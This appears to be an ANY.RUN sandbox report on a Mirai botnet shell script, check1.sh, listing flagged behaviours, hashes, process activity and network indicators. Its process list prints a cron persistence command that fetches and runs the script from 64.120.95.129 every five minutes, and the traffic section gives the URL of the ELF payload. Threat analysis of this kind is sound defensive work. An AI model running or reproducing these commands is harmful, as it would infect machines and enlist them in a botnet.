File name:

check1.sh

Full analysis: https://app.any.run/tasks/5dc33a56-971d-474b-af48-2b9bc6d21a52
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: February 26, 2026, 04:52:29
OS: Ubuntu 22.04.2
Tags:
nohuptest
auto
mirai
botnet
MIME: text/x-shellscript
File info: Bourne-Again shell script, Unicode text, UTF-8 text executable
MD5:

9C39072C6984817336178BF889E186B0

SHA1:

495AB15D0D5439D4E0FC60A91D46F048978B8708

SHA256:

0BDD42672C0F44295C963EF75642FF6FA95BBADA4D9EB3C08A29D1AAC4EB7CAA

SSDEEP:

24:VUeYj+H1gPDMK9CFdYhEnHQBYcduuD9I5MCPCARiy3AnQZaZl1cSRs/:VUeYj+H1gPDMK9CnYhEkDlCPCuiywOjJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been found (auto)

      • curl (PID: 1986)
      • wget (PID: 1995)

  • SUSPICIOUS

    • Reads passwd file

      • crontab (PID: 1973)
      • crontab (PID: 1969)
      • crontab (PID: 1972)
      • curl (PID: 1986)

    • Modifies file or directory owner

      • sudo (PID: 1963)

    • Modifies Cron jobs

      • bash (PID: 1967)

    • Gets information about currently running processes

      • bash (PID: 1967)
      • bash (PID: 1977)

    • Process resilience attempt

      • bash (PID: 1976)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 1967)

    • Clears command history

      • rm (PID: 2029)

    • Potential Corporate Privacy Violation

      • curl (PID: 1986)
      • wget (PID: 1995)

    • Uses wget to download content

      • bash (PID: 1967)

  • INFO

    • Checks timezone

      • crontab (PID: 1969)
      • crontab (PID: 1972)
      • crontab (PID: 1973)
      • wget (PID: 1995)

    • Creates file in the temporary folder

      • flock (PID: 1975)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
277
Monitored processes
158
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs crontab no specs grep no specs bash no specs crontab no specs crontab no specs pgrep no specs flock no specs rm no specs bash no specs sleep no specs bash no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs dash no specs #MIRAI curl pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs #MIRAI wget pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs chmod no specs bash no specs rm no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs rm no specs rm no specs rm no specs rm no specs rm no specs rm no specs clear no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs pgrep no specs pgrep no specs pgrep no specs pgrep no specs sleep no specs

Process information

PID
CMD
Path
Indicators
Parent process
1962/bin/sh -c "sudo chown user /tmp/check1\.sh && chmod +x /tmp/check1\.sh && DISPLAY=:0 sudo -iu user /tmp/check1\.sh "/usr/bin/dash2EwNpII9hL0vkNEQ
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1963sudo chown user /tmp/check1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1964chown user /tmp/check1.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1965chmod +x /tmp/check1.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1966sudo -iu user /tmp/check1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1967/bin/bash /tmp/check1.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1968/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1969crontab -l/usr/bin/crontabbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1970grep -Fq "*/5 * * * * /usr/bin/bash -c 'cd /tmp && bash <(curl -s http://64\.120\.95\.129/check1\.sh)' &"/usr/bin/grepbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre.so.3.13.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1971/bin/bash /tmp/check1.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
1972crontab/var/spool/cron/crontabs/usertext
MD5:
SHA256:
1986curl/var/tmp/Error84binary
MD5:
SHA256:
1995wget/var/tmp/Error84.1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
9
DNS requests
13
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.97:80
http://connectivity-check.ubuntu.com/
unknown
unknown
1986
curl
GET
64.120.95.129:80
http://64.120.95.129/Error84
unknown
unknown
1995
wget
GET
200
64.120.95.129:80
http://64.120.95.129/Error84
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
456
avahi-daemon
224.0.0.251:5353
whitelisted
185.125.190.18:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
91.189.91.97:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
1986
curl
64.120.95.129:80
LEASEWEB-APAC-SIN-11 LEASEWEB SINGAPORE PTE. LTD.
SG
unknown
473
snapd
185.125.188.58:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
1995
wget
64.120.95.129:80
LEASEWEB-APAC-SIN-11 LEASEWEB SINGAPORE PTE. LTD.
SG
unknown
416
systemd-timesyncd
185.125.190.57:123
ntp.ubuntu.com
CANONICAL-AS
GB
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.251.208.174
  • 2a00:1450:4001:808::200e
whitelisted
connectivity-check.ubuntu.com
  • 91.189.91.97
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.48
  • 185.125.190.49
  • 185.125.190.96
  • 91.189.91.98
  • 185.125.190.17
  • 91.189.91.49
  • 185.125.190.98
  • 185.125.190.97
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::22
  • 2001:67c:1562::24
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::23
whitelisted
7.100.168.192.in-addr.arpa
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.59
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2cc
  • 2620:2d:4000:1010::2d6
whitelisted
ntp.ubuntu.com
  • 185.125.190.57
  • 185.125.190.56
  • 185.125.190.58
  • 91.189.91.157
  • 2620:2d:4000:1::3f
  • 2620:2d:4000:1::41
  • 2620:2d:4000:1::40
whitelisted

Threats

PID
Process
Class
Message
1986
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
1986
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
1995
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
check1.sh